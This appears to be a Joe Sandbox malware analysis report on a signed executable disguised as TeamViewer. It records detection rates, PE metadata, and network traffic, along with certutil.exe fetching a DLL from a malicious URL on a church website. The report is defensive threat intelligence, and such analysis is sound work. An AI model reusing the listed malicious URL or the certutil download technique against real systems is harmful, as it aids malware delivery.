Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Regsvr321	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	DLL Side-Loading1	Cached Domain Credentials	System Information Discovery23	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
cBQPecnQRp.exe	10%	Virustotal		Browse
cBQPecnQRp.exe	2%	ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
christchurchmvl.org	0%	Virustotal		Browse
www.christchurchmvl.org	2%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://www.christchurchmvl.org/volunteer/actXApiLib.dll	11%	Virustotal		Browse
https://www.christchurchmvl.org/volunteer/actXApiLib.dll	0%	Avira URL Cloud	safe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
https://www.christchurchmvl.org/volunteer/actXApiLib.dllC:	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
christchurchmvl.org	100.26.95.170	true	true	0%, Virustotal, Browse	unknown
www.christchurchmvl.org	unknown	unknown	true	2%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.christchurchmvl.org/volunteer/actXApiLib.dll	true	11%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	cBQPecnQRp.exe	false	URL Reputation: safe	unknown
https://sectigo.com/CPS0	cBQPecnQRp.exe	false	URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	cBQPecnQRp.exe	false	URL Reputation: safe	unknown
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	cBQPecnQRp.exe	false	URL Reputation: safe	unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	cBQPecnQRp.exe	false	URL Reputation: safe	unknown
http://ocsp.sectigo.com0	cBQPecnQRp.exe	false	URL Reputation: safe	unknown
https://www.christchurchmvl.org/volunteer/actXApiLib.dllC:	certutil.exe, 0000000A.00000002.777469638.0000000000930000.00000004.00000040.sdmp	true	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
100.26.95.170	christchurchmvl.org	United States		14618	AMAZON-AESUS	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	483791
Start date:	15.09.2021
Start time:	13:45:42
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	cBQPecnQRp (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal72.evad.winEXE@8/1@2/1
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 99% Number of executed functions: 33 Number of non-executed functions: 200
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 20.49.157.6, 92.122.145.220, 20.82.210.154, 23.55.161.168, 23.55.161.155, 23.55.161.144, 23.55.161.165, 23.55.161.159, 23.55.161.148, 23.55.161.164, 23.55.161.163, 23.55.161.162, 20.54.110.249, 40.112.88.60, 23.216.77.208, 23.216.77.209 Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:47:28	API Interceptor	1x Sleep call for process: certutil.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
100.26.95.170	http://ashevilleurological.com/library/photos/medium/index.html	Get hash	malicious	Browse	ashevilleurological.com/library/photos/medium/favicon.ico

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AMAZON-AESUS	1If1ISJz9D.exe	Get hash	malicious	Browse	100.26.95.170
	Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe	Get hash	malicious	Browse	52.71.133.130
	PO7420.exe	Get hash	malicious	Browse	52.4.209.250
	DLH1TwLBhW.exe	Get hash	malicious	Browse	50.16.244.183
	avxeC9Wssi	Get hash	malicious	Browse	54.57.110.152
	Quotation urgent.exe	Get hash	malicious	Browse	52.201.24.227
	KOC RFQ.doc	Get hash	malicious	Browse	52.204.77.43
	PO. 2100002_pdf____________________________________.exe	Get hash	malicious	Browse	3.223.115.185
	hhh.mp3.dll	Get hash	malicious	Browse	54.243.45.255
	xrm4z50ja9.exe	Get hash	malicious	Browse	54.83.52.76
	Swift Trf.exe	Get hash	malicious	Browse	52.201.24.227
	HjIXsbs4Jg	Get hash	malicious	Browse	54.142.124.216
	7b388AC1Fw	Get hash	malicious	Browse	44.194.145.151
	DPD.apk	Get hash	malicious	Browse	50.16.244.183
	Po2142021.xlsx	Get hash	malicious	Browse	18.213.250.117
	FlashPlayerUpdate.apk	Get hash	malicious	Browse	23.21.76.7
	QcXQmNSaSp	Get hash	malicious	Browse	18.207.108.88
	i586	Get hash	malicious	Browse	34.231.175.5
	arm	Get hash	malicious	Browse	54.133.131.54
	zoD4YzpMMG	Get hash	malicious	Browse	54.80.227.212

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ce5f3254611a8c095a3d821d44539877	1If1ISJz9D.exe	Get hash	malicious	Browse	100.26.95.170
	FjtSz0VShQ.exe	Get hash	malicious	Browse	100.26.95.170
	DlZa7n6PjI.exe	Get hash	malicious	Browse	100.26.95.170
	L5q2UZAWzY.exe	Get hash	malicious	Browse	100.26.95.170
	SecuriteInfo.com.Trojan.DownLoader43.21162.28718.exe	Get hash	malicious	Browse	100.26.95.170
	N3sJiiIQAP.exe	Get hash	malicious	Browse	100.26.95.170
	hu5De62I6f.exe	Get hash	malicious	Browse	100.26.95.170
	cwCpwXnpg4.exe	Get hash	malicious	Browse	100.26.95.170
	SacEedFBvw.exe	Get hash	malicious	Browse	100.26.95.170
	z5k6kTAFkF.exe	Get hash	malicious	Browse	100.26.95.170
	cGJCfDNHnZ.exe	Get hash	malicious	Browse	100.26.95.170
	GCw589FSm7.exe	Get hash	malicious	Browse	100.26.95.170
	67d16a17f27f15cf21671ccb406e1e8b647aaf90c72c9.exe	Get hash	malicious	Browse	100.26.95.170
	vPzJQvH6Pg.exe	Get hash	malicious	Browse	100.26.95.170
	9f60a157b1a91cc18125825a286baaf011e65b0808be4.exe	Get hash	malicious	Browse	100.26.95.170
	P8zmYu7q7j.exe	Get hash	malicious	Browse	100.26.95.170
	P8zmYu7q7j.exe	Get hash	malicious	Browse	100.26.95.170
	Wyb6Tqwcqx.exe	Get hash	malicious	Browse	100.26.95.170
	8mFCVBuwst.exe	Get hash	malicious	Browse	100.26.95.170
	75114eeae6429f297193678413f5523eea5e25474745d.exe	Get hash	malicious	Browse	100.26.95.170
37f463bf4616ecd445d4a1937da06e19	1If1ISJz9D.exe	Get hash	malicious	Browse	100.26.95.170
	26pBOwgewg.exe	Get hash	malicious	Browse	100.26.95.170
	lMESQl89na.exe	Get hash	malicious	Browse	100.26.95.170
	JHHPuXppBJ.exe	Get hash	malicious	Browse	100.26.95.170
	kpbNbKpJfr.dll	Get hash	malicious	Browse	100.26.95.170
	mfQoul1M1Q.exe	Get hash	malicious	Browse	100.26.95.170
	k4fNN2WDpY.dll	Get hash	malicious	Browse	100.26.95.170
	SecuriteInfo.com.__vbaHresultCheckObj.22789.exe	Get hash	malicious	Browse	100.26.95.170
	w9CH3AAVOp.exe	Get hash	malicious	Browse	100.26.95.170
	Halkbank02.exe	Get hash	malicious	Browse	100.26.95.170
	DlZa7n6PjI.exe	Get hash	malicious	Browse	100.26.95.170
	7Tat85Af0C.exe	Get hash	malicious	Browse	100.26.95.170
	86jLEXtwqR.exe	Get hash	malicious	Browse	100.26.95.170
	6WtKevhqlg.exe	Get hash	malicious	Browse	100.26.95.170
	oLn3NAKPzu.exe	Get hash	malicious	Browse	100.26.95.170
	hd9uHo4dot.exe	Get hash	malicious	Browse	100.26.95.170
	47U9eIz5bG.exe	Get hash	malicious	Browse	100.26.95.170
	FaxGUO65DE.391343-Faa.html	Get hash	malicious	Browse	100.26.95.170
	FaxGUO65DE.391343-Faa.html	Get hash	malicious	Browse	100.26.95.170
	x13NYP60fd.exe	Get hash	malicious	Browse	100.26.95.170

Dropped Files

No context

Created / dropped Files

C:\ProgramData\actXApiLib.dll Download File
Process:	C:\Windows\SysWOW64\certutil.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	196
Entropy (8bit):	5.098952451791238
Encrypted:	false
SSDEEP:	6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezocKqD:J0+oxBeRmR9etdzRxGez1T
MD5:	62962DAA1B19BBCC2DB10B7BFD531EA6
SHA1:	D64BAE91091EDA6A7532EBEC06AA70893B79E1F8
SHA-256:	80C3FE2AE1062ABF56456F52518BD670F9EC3917B7F85E152B347AC6B6FAF880
SHA-512:	9002A0475FDB38541E78048709006926655C726E93E823B84E2DBF5B53FD539A5342E7266447D23DB0E5528E27A19961B115B180C94F2272FF124C7E5C8304E7
Malicious:	true
Reputation:	low
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.</body></html>.

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.445333009028377
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	cBQPecnQRp.exe
File size:	1363448
MD5:	53817315b195e328ccc0f56b15b247c7
SHA1:	7bedab96b89d000288b573de0b5693cf49dae47f
SHA256:	ea2decec34ae3129d5da1f2035b34cff3c9f656bb4423904ef6b0a3ca5f47d5e
SHA512:	2ca834743045f742bc65da90f1b0868af54f7d703c0ef11b6deac4080bb7260ad2f9d5d0bb7b5e2a2eca5ef837c6ad976234594e931c6fbfce06c8e1d4cb1512
SSDEEP:	24576:NVPOpKJdaWTVE6LwF5oSZc1HHZZZ6OEtdU:mId1+6cjoSMHHZZZ6OEtd
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......s..r7..!7..!7..!l.. !..!l.. ...!... &..!... /..!... 1..!... ...!l.. ...!l.. 4..!... ...!7..!`..!mK1!?..!7..!...!... a..!...!6..

File Icon


Icon Hash:	78706a6ab8a180c0

Static PE Info

General
Entrypoint:	0x44f6f0
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	GUARD_CF, TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:	0x5FD76A63 [Mon Dec 14 13:36:35 2020 UTC]
TLS Callbacks:	0x494680, 0x494e50, 0x494eb0
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	b5f0210fb8fa3412ad980dc8b3f3cd95

Authenticode Signature

Signature Valid:	true
Signature Issuer:	CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
Signature Validation Error:	The operation completed successfully
Error Number:	0
Not Before, Not After	6/4/2021 2:00:00 AM 6/5/2022 1:59:59 AM
Subject Chain	CN=Hartex LLC, O=Hartex LLC, L=Moscow, C=RU
Version:	3
Thumbprint MD5:	5D5CA7E8D78224799E8AA101FF486137
Thumbprint SHA-1:	319517761E92EC6EEF1966A5994570D46A498093
Thumbprint SHA-256:	AC50A5D91A71BA8447EE795FF966E625AEC004E49EB24ADAA366B988686B65A5
Serial:	009B576882CCDB891FD6E4A66671F3AC71

Entrypoint Preview

Instruction
call 00007FA0C4A06EA8h
jmp 00007FA0C4A064BDh
push ebp
mov ebp, esp
pop ebp
jmp 00007FA0C4A05F16h
jmp 00007FA0C4A05EEDh
int3
int3
int3
int3
int3
int3
int3
int3
push ecx
lea ecx, dword ptr [esp+08h]
sub ecx, eax
and ecx, 0Fh
add eax, ecx
sbb ecx, ecx
or eax, ecx
pop ecx
jmp 00007FA0C4A06F8Fh
push ecx
lea ecx, dword ptr [esp+08h]
sub ecx, eax
and ecx, 07h
add eax, ecx
sbb ecx, ecx
or eax, ecx
pop ecx
jmp 00007FA0C4A06F79h
mov ecx, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
ret
mov ecx, dword ptr [ebp-10h]
xor ecx, ebp
call 00007FA0C4A05E9Fh
jmp 00007FA0C4A06620h
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [004F4024h]
xor eax, ebp
push eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [004F4024h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], eax

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xf2f44	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xfe000	0x47b40	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x14a800	0x25f8	.reloc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x146000	0xa23c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xe2c10	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xe2c64	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xbe8d8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xb9000	0x24c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0xf2598	0x160	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xb718a	0xb7200	False	0.495668462031	data	6.785949083	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0xb9000	0x3acc0	0x3ae00	False	0.322618099788	COM executable for DOS	6.31638797155	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xf4000	0x8ac8	0x6200	False	0.153698979592	data	4.61512382052	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.didat	0xfd000	0x164	0x200	False	0.41015625	data	3.13519516789	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0xfe000	0x47b40	0x47c00	False	0.076784353223	data	3.18159027325	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x146000	0xa23c	0xa400	False	0.605182926829	data	6.59143707944	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_BITMAP	0xfe3b8	0x1568	data	German	Germany
RT_BITMAP	0xff920	0x1d8	data	German	Germany
RT_ICON	0xffe28	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x100290	0x10a8	data	English	United States
RT_ICON	0x101338	0x25a8	data	English	United States
RT_ICON	0x1038e0	0x42028	data	English	United States
RT_DIALOG	0xfe310	0xa4	data	German	Germany
RT_STRING	0x145958	0x62	data	English	United States
RT_ACCELERATOR	0x145948	0x10	data	English	United States
RT_GROUP_ICON	0x145908	0x3e	data	English	United States
RT_VERSION	0xffaf8	0x32c	data	German	Germany
RT_MANIFEST	0x1459c0	0x17d	XML 1.0 document text	English	United States

Imports

DLL

Import

KERNEL32.dll

LoadLibraryExA, GetModuleHandleA, GetModuleFileNameA, GetSystemDirectoryA, GetModuleFileNameW, SetLastError, EnterCriticalSection, LeaveCriticalSection, GetCurrentThreadId, RaiseException, DeleteCriticalSection, GetLastError, InitializeCriticalSectionEx, HeapDestroy, HeapSize, HeapReAlloc, HeapFree, HeapAlloc, GetProcessHeap, SizeofResource, LockResource, LoadResource, FindResourceW, FindResourceExW, DecodePointer, GetProcAddress, FreeLibrary, VerSetConditionMask, VerifyVersionInfoW, IsWow64Process, GetCurrentProcess, SetSearchPathMode, SetDllDirectoryW, HeapSetInformation, SetProcessDEPPolicy, GetSystemDirectoryW, LoadLibraryExW, LoadLibraryW, GetFileAttributesW, CreateFileW, CloseHandle, WideCharToMultiByte, LocalFree, FormatMessageW, FormatMessageA, CreateTimerQueue, GetSystemInfo, VirtualProtect, VirtualQuery, GetModuleHandleW, MultiByteToWideChar, GetStringTypeW, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, EncodePointer, LCMapStringW, GetLocaleInfoW, GetCPInfo, InitializeSListHead, InterlockedPopEntrySList, InterlockedPushEntrySList, FlushInstructionCache, IsProcessorFeaturePresent, VirtualAlloc, VirtualFree, IsDebuggerPresent, OutputDebugStringW, SetEvent, ResetEvent, WaitForSingleObjectEx, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, RtlUnwind, InterlockedFlushSList, ExitProcess, GetModuleHandleExW, GetStdHandle, WriteFile, GetCurrentThread, GetFileType, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, WriteConsoleW, WaitForMultipleObjects, WaitForSingleObject, TerminateThread, QueueUserAPC, CreateEventA, CreateDirectoryW, InitializeCriticalSection, ReleaseMutex, CreateMutexW, OpenMutexW, GetFileSize, OpenEventA, UnregisterWaitEx, Sleep, RegisterWaitForSingleObject, GetLocalTime, DuplicateHandle, ReleaseSemaphore, SetThreadPriority, QueryPerformanceFrequency, GetThreadTimes, TryEnterCriticalSection, GetLogicalProcessorInformation, CreateThread, FreeLibraryAndExitThread, SignalObjectAndWait, GetThreadPriority, CreateTimerQueueTimer, ChangeTimerQueueTimer, DeleteTimerQueueTimer, GetNumaHighestNodeNumber, GetProcessAffinityMask, SetThreadAffinityMask, UnregisterWait, GetVersionExW, QueryDepthSList

Version Infos

Description	Data
LegalCopyright	TeamViewer Germany GmbH
InternalName	TeamViewer
FileVersion	15.13.6.0
CompanyName	TeamViewer Germany GmbH
LegalTrademarks	TeamViewer
ProductName	TeamViewer
ProductVersion	15.13.6.0
FileDescription	TeamViewer
OriginalFilename	TeamViewer_Note.exe
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
German	Germany
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 15, 2021 13:47:27.926995993 CEST	49772	443	192.168.2.4	100.26.95.170
Sep 15, 2021 13:47:27.927061081 CEST	443	49772	100.26.95.170	192.168.2.4
Sep 15, 2021 13:47:27.927170992 CEST	49772	443	192.168.2.4	100.26.95.170
Sep 15, 2021 13:47:27.931725025 CEST	49772	443	192.168.2.4	100.26.95.170
Sep 15, 2021 13:47:27.931766033 CEST	443	49772	100.26.95.170	192.168.2.4
Sep 15, 2021 13:47:28.359617949 CEST	443	49772	100.26.95.170	192.168.2.4
Sep 15, 2021 13:47:28.359714031 CEST	49772	443	192.168.2.4	100.26.95.170
Sep 15, 2021 13:47:28.408446074 CEST	49772	443	192.168.2.4	100.26.95.170
Sep 15, 2021 13:47:28.408477068 CEST	443	49772	100.26.95.170	192.168.2.4
Sep 15, 2021 13:47:28.408838034 CEST	443	49772	100.26.95.170	192.168.2.4
Sep 15, 2021 13:47:28.473718882 CEST	49772	443	192.168.2.4	100.26.95.170
Sep 15, 2021 13:47:29.485140085 CEST	49772	443	192.168.2.4	100.26.95.170
Sep 15, 2021 13:47:29.527137995 CEST	443	49772	100.26.95.170	192.168.2.4
Sep 15, 2021 13:47:29.625088930 CEST	443	49772	100.26.95.170	192.168.2.4
Sep 15, 2021 13:47:29.641112089 CEST	49772	443	192.168.2.4	100.26.95.170
Sep 15, 2021 13:47:30.275280952 CEST	49773	443	192.168.2.4	100.26.95.170
Sep 15, 2021 13:47:30.275331020 CEST	443	49773	100.26.95.170	192.168.2.4
Sep 15, 2021 13:47:30.275847912 CEST	49773	443	192.168.2.4	100.26.95.170
Sep 15, 2021 13:47:30.276878119 CEST	49773	443	192.168.2.4	100.26.95.170
Sep 15, 2021 13:47:30.276904106 CEST	443	49773	100.26.95.170	192.168.2.4
Sep 15, 2021 13:47:30.557873964 CEST	443	49773	100.26.95.170	192.168.2.4
Sep 15, 2021 13:47:30.558068991 CEST	49773	443	192.168.2.4	100.26.95.170
Sep 15, 2021 13:47:31.136315107 CEST	49773	443	192.168.2.4	100.26.95.170
Sep 15, 2021 13:47:31.136341095 CEST	443	49773	100.26.95.170	192.168.2.4
Sep 15, 2021 13:47:31.136692047 CEST	443	49773	100.26.95.170	192.168.2.4
Sep 15, 2021 13:47:31.136763096 CEST	49773	443	192.168.2.4	100.26.95.170
Sep 15, 2021 13:47:31.137299061 CEST	49773	443	192.168.2.4	100.26.95.170
Sep 15, 2021 13:47:31.179140091 CEST	443	49773	100.26.95.170	192.168.2.4
Sep 15, 2021 13:47:31.276369095 CEST	443	49773	100.26.95.170	192.168.2.4
Sep 15, 2021 13:47:31.276463985 CEST	49773	443	192.168.2.4	100.26.95.170
Sep 15, 2021 13:47:31.276484013 CEST	443	49773	100.26.95.170	192.168.2.4
Sep 15, 2021 13:47:31.276531935 CEST	49773	443	192.168.2.4	100.26.95.170
Sep 15, 2021 13:47:31.291244984 CEST	49773	443	192.168.2.4	100.26.95.170
Sep 15, 2021 13:47:31.291408062 CEST	443	49773	100.26.95.170	192.168.2.4
Sep 15, 2021 13:47:31.291496038 CEST	49773	443	192.168.2.4	100.26.95.170

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 15, 2021 13:46:34.089144945 CEST	55854	53	192.168.2.4	8.8.8.8
Sep 15, 2021 13:46:34.133929968 CEST	53	55854	8.8.8.8	192.168.2.4
Sep 15, 2021 13:46:36.824444056 CEST	64549	53	192.168.2.4	8.8.8.8
Sep 15, 2021 13:46:36.863562107 CEST	53	64549	8.8.8.8	192.168.2.4
Sep 15, 2021 13:47:10.051311970 CEST	63153	53	192.168.2.4	8.8.8.8
Sep 15, 2021 13:47:10.079045057 CEST	53	63153	8.8.8.8	192.168.2.4
Sep 15, 2021 13:47:25.735857010 CEST	52991	53	192.168.2.4	8.8.8.8
Sep 15, 2021 13:47:25.764188051 CEST	53	52991	8.8.8.8	192.168.2.4
Sep 15, 2021 13:47:27.737127066 CEST	53700	53	192.168.2.4	8.8.8.8
Sep 15, 2021 13:47:27.914834023 CEST	53	53700	8.8.8.8	192.168.2.4
Sep 15, 2021 13:47:30.207760096 CEST	51726	53	192.168.2.4	8.8.8.8
Sep 15, 2021 13:47:30.271061897 CEST	53	51726	8.8.8.8	192.168.2.4
Sep 15, 2021 13:47:31.987982035 CEST	56794	53	192.168.2.4	8.8.8.8
Sep 15, 2021 13:47:32.026420116 CEST	53	56794	8.8.8.8	192.168.2.4
Sep 15, 2021 13:47:32.757365942 CEST	56534	53	192.168.2.4	8.8.8.8
Sep 15, 2021 13:47:32.811314106 CEST	53	56534	8.8.8.8	192.168.2.4
Sep 15, 2021 13:47:33.307559967 CEST	56627	53	192.168.2.4	8.8.8.8
Sep 15, 2021 13:47:33.334069014 CEST	53	56627	8.8.8.8	192.168.2.4
Sep 15, 2021 13:47:33.695559978 CEST	56621	53	192.168.2.4	8.8.8.8
Sep 15, 2021 13:47:33.698770046 CEST	63116	53	192.168.2.4	8.8.8.8
Sep 15, 2021 13:47:33.735899925 CEST	53	56621	8.8.8.8	192.168.2.4
Sep 15, 2021 13:47:33.754201889 CEST	53	63116	8.8.8.8	192.168.2.4
Sep 15, 2021 13:47:34.294879913 CEST	64078	53	192.168.2.4	8.8.8.8
Sep 15, 2021 13:47:34.367065907 CEST	53	64078	8.8.8.8	192.168.2.4
Sep 15, 2021 13:47:35.136635065 CEST	64801	53	192.168.2.4	8.8.8.8
Sep 15, 2021 13:47:35.165318966 CEST	53	64801	8.8.8.8	192.168.2.4
Sep 15, 2021 13:47:35.826641083 CEST	61721	53	192.168.2.4	8.8.8.8
Sep 15, 2021 13:47:35.885911942 CEST	53	61721	8.8.8.8	192.168.2.4
Sep 15, 2021 13:47:36.763900995 CEST	51255	53	192.168.2.4	8.8.8.8
Sep 15, 2021 13:47:36.793672085 CEST	53	51255	8.8.8.8	192.168.2.4
Sep 15, 2021 13:47:37.570334911 CEST	61522	53	192.168.2.4	8.8.8.8
Sep 15, 2021 13:47:37.610944033 CEST	53	61522	8.8.8.8	192.168.2.4
Sep 15, 2021 13:47:38.181309938 CEST	52337	53	192.168.2.4	8.8.8.8
Sep 15, 2021 13:47:38.214015007 CEST	53	52337	8.8.8.8	192.168.2.4
Sep 15, 2021 13:47:49.626492977 CEST	55046	53	192.168.2.4	8.8.8.8
Sep 15, 2021 13:47:49.663325071 CEST	53	55046	8.8.8.8	192.168.2.4
Sep 15, 2021 13:48:23.738024950 CEST	49612	53	192.168.2.4	8.8.8.8
Sep 15, 2021 13:48:23.775444031 CEST	53	49612	8.8.8.8	192.168.2.4
Sep 15, 2021 13:48:25.384879112 CEST	49285	53	192.168.2.4	8.8.8.8
